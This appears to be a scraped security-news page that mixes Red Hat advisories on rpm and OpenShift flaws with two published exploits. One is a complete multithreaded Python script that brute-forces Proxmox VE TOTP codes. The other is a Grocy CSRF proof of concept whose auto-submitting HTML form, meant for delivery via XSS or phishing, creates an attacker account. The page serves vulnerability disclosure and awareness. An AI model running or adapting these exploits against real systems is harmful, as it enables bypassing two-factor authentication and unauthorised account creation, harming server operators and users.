https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmW742EACgkQZF0CR8NudjdCCA//R3r8wJi68kZQZOOUeekz1PrrGI/uFuD3Ial5GxJytfKDyuXI8d55GyXbqCZzMQYeL0l9JO5wEscb2wixvnaD+4zG1cb6hwMFo7Rae1KMMgo9JHKgOFVIPnI9upvtDI8GdQoJyhoVIRab4FkD09lNUYIz2UCUJEwORa7+JVaCoSYiG3Mkj2p2SDwxpn2BiN5rI/G/GrfF/nJuJ+ebiZsh3jQyfsreomKo6Bq3ajsYKs5G4osOxK164Mjp8gKYx82dzxiK2e/58gvEUdY3h3oG8twQMJ5VrYgIT19Ih4XNpn50x4Bn+OlzTR7vPG6RuOgTY/XjHr4Pfc+NYd7hEfyH37KODFUCC5482jCY9aLSHmP/poGmo8SfSBO+H7NmZC8g8co2hOf30Bczfndb4TMpz8PRz/zojzBWmL2mIYU/O0aavcS+xO8gy753xuoESFbjj9Z0j5YRphyCyh/aB3gKxiY+LMh97EEjQWvI8XJucYJ+6IFdNWJOHTNoZEOe7tXnwKQ4EP4BtG7DDfaH7+VaKJ64ZkAqeXK8niIMPGfb7km4o7wVk58XI88+Yj9xtW+8opyBjahmhCwXs+01S2e+BfOb3k22HXBwNZ9Idq0KTtoRm4Jazf/JH3MTQLS8ri5ZFPeqIdkJer2tN0lSv2KeVASYd1j3oCgG2LJA6eHiNhE==B96X-----END PGP SIGNATURE-----

Debian Security Advisory 5612-1

Proxmox VE versions 5.4 through 7.4-1 suffer from a TOTP brute forcing vulnerability.

    # Exploit Title: Proxmox VE TOTP Brute Force# Date: 09/23/2023# Exploit Author: Cory Cline, Gabe Rust# Vendor Homepage: https://www.proxmox.com/en/# Software Link: http://download.proxmox.com/iso/# Version: 5.4 - 7.4-1# Tested on: Debian# CVE : CVE-2023-43320import timeimport requestsimport urllib.parseimport jsonimport osimport urllib3urllib3.disable_warnings()threads=25#################### REPLACE THESE VALUES #########################password="KNOWN PASSWORD HERE"username="KNOWN USERNAME HERE"target_url="https://HOST:PORT"##################################################################ticket=""ticket_username=""CSRFPreventionToken=""ticket_data={}auto_refresh_time = 20 # in minutes - 30 minutes before expirationlast_refresh_time = 0tokens = [];for num in range(0,1000000):    tokens.append(str(num).zfill(6))def refresh_ticket(target_url, username, password):    global CSRFPreventionToken    global ticket_username    global ticket_data    refresh_ticket_url = target_url + "/api2/extjs/access/ticket"    refresh_ticket_cookies = {}    refresh_ticket_headers = {}    refresh_ticket_data = {"username": username, "password": password, "realm": "pve", "new-format": "1"}    ticket_data_raw = urllib.parse.unquote(requests.post(refresh_ticket_url, headers=refresh_ticket_headers, cookies=refresh_ticket_cookies, data=refresh_ticket_data, verify=False).text)    ticket_data = json.loads(ticket_data_raw)    CSRFPreventionToken = ticket_data["data"]["CSRFPreventionToken"]    ticket_username = ticket_data["data"]["username"]def attack(token):    global last_refresh_time    global auto_refresh_time    global target_url    global username    global password    global ticket_username    global ticket_data    if ( int(time.time()) > (last_refresh_time + (auto_refresh_time * 60)) ):        refresh_ticket(target_url, username, password)        last_refresh_time = int(time.time())    url = target_url + "/api2/extjs/access/ticket"    cookies = {}    headers = {"Csrfpreventiontoken": CSRFPreventionToken}    stage_1_ticket = str(json.dumps(ticket_data["data"]["ticket"]))[1:-1]    stage_2_ticket = stage_1_ticket.replace('\\"totp\\":', '\"totp\"%3A').replace('\\"recovery\\":', '\"recovery\"%3A')    data = {"username": ticket_username, "tfa-challenge": stage_2_ticket, "password": "totp:" + str(token)}    response = requests.post(url, headers=headers, cookies=cookies, data=data, verify=False)    if(len(response.text) > 350):        print(response.text)        os._exit(1)while(1):    refresh_ticket(target_url, username, password)    last_refresh_time = int(time.time())    with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:        res = [executor.submit(attack, token) for token in tokens]        concurrent.futures.wait(res)

Proxmox VE 7.4-1 TOTP Brute Force

Red Hat Security Advisory 2024-0647-03 - An update for rpm is now available for Red Hat Enterprise Linux 8.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0647.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: rpm security updateAdvisory ID:        RHSA-2024:0647-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0647Issue date:         2024-02-01Revision:           03CVE Names:          CVE-2021-35937====================================================================Summary: An update for rpm is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The RPM Package Manager (RPM) is a command-line driven package management system capable of installing, uninstalling, verifying, querying, and updating software packages.Security Fix(es):* rpm: TOCTOU race in checks for unsafe symlinks (CVE-2021-35937)* rpm: races with chown/chmod/capabilities calls during installation (CVE-2021-35938)* rpm: checks for unsafe symlinks are not performed for intermediary directories (CVE-2021-35939)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2021-35937References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=1964114https://bugzilla.redhat.com/show_bug.cgi?id=1964125https://bugzilla.redhat.com/show_bug.cgi?id=1964129

Red Hat Security Advisory 2024-0647-03

Red Hat Security Advisory 2024-0484-03 - Red Hat OpenShift Container Platform release 4.13.31 is now available with updates to packages and images that fix several bugs and add enhancements.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0484.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: OpenShift Container Platform 4.13.31 bug fix and security update  
Advisory ID:        RHSA-2024:0484-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0484  
Issue date:         2024-02-01  
Revision:           03  
CVE Names:          CVE-2023-39325  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.13.31 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.13.

Red Hat Product Security has rated this update as having a security impact of  Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.13.31. See the following advisory for the RPM packages for this release:

https://access.redhat.com/errata/RHBA-2024:0488

Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.13/release_notes/ocp-4-13-release-notes.html

Security Fix(es):

* golang: net/http, x/net/http2: rapid stream resets can cause excessive  
work (CVE-2023-44487) (CVE-2023-39325)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

All OpenShift Container Platform 4.13 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.13/updating/updating-cluster-cli.html

Solution:

https://docs.openshift.com/container-platform/4.13/release_notes/ocp-4-13-release-notes.html

CVEs:

CVE-2023-39325

References:

https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-003  
https://bugzilla.redhat.com/show_bug.cgi?id=2243296  
https://issues.redhat.com/browse/OCPBUGS-22272  
https://issues.redhat.com/browse/OCPBUGS-24419  
https://issues.redhat.com/browse/OCPBUGS-26423  
https://issues.redhat.com/browse/OCPBUGS-27049  
https://issues.redhat.com/browse/OCPBUGS-27172  
https://issues.redhat.com/browse/OCPBUGS-27233  
https://issues.redhat.com/browse/OCPBUGS-27367  
https://issues.redhat.com/browse/OCPBUGS-27370  
https://issues.redhat.com/browse/OCPBUGS-27416  
https://issues.redhat.com/browse/OCPBUGS-27754

Red Hat Security Advisory 2024-0484-03

Grocy versions 4.0.2 and below suffer from a cross site request forgery vulnerabilities.

    # Exploit Title: Grocy <= 4.0.2 CSRF Vulnerability# Application: Grocy# Version: <= 4.0.2# Date: 09/21/2023# Exploit Author: Chance Proctor# Vendor Homepage: https://grocy.info/# Software Link: https://github.com/grocy/grocy# Tested on: Linux# CVE : CVE-2023-42270Overview==================================================When creating a new user in Grocy 4.0.2, the new user request is made using JSON formatting.This makes it easy to adjust your request since it is a known format. There is also no CSRF Token or other methods of verification in place to verify where the request is coming from.This allows for html code to generate a new user as long as the target is logged in and has Create User Permissions.Proof of Concept==================================================Host the following html code via a XSS or delivery via a phishing campaign:  <html>  <form action="/api/users" method="post" enctype="application/x-www-form-urlencoded">  <input name='username' value='hacker' type='hidden'>  <input name='password' value='test' type='hidden'>  <input type=submit>  </form>  <script>  history.pushState('','', '/');  document.forms[0].submit();  </script>  </html>If a user is logged into the Grocy Webapp at time of execution, a new user will be created in the app with the following credentials  Username: hacker  Password: testNote:In order for this to work, the target must have Create User Permissions.This is enabled by default.Proof of Exploit/Reproduce==================================================http://xploit.sh/posts/cve-2023-42270/

Tag

#js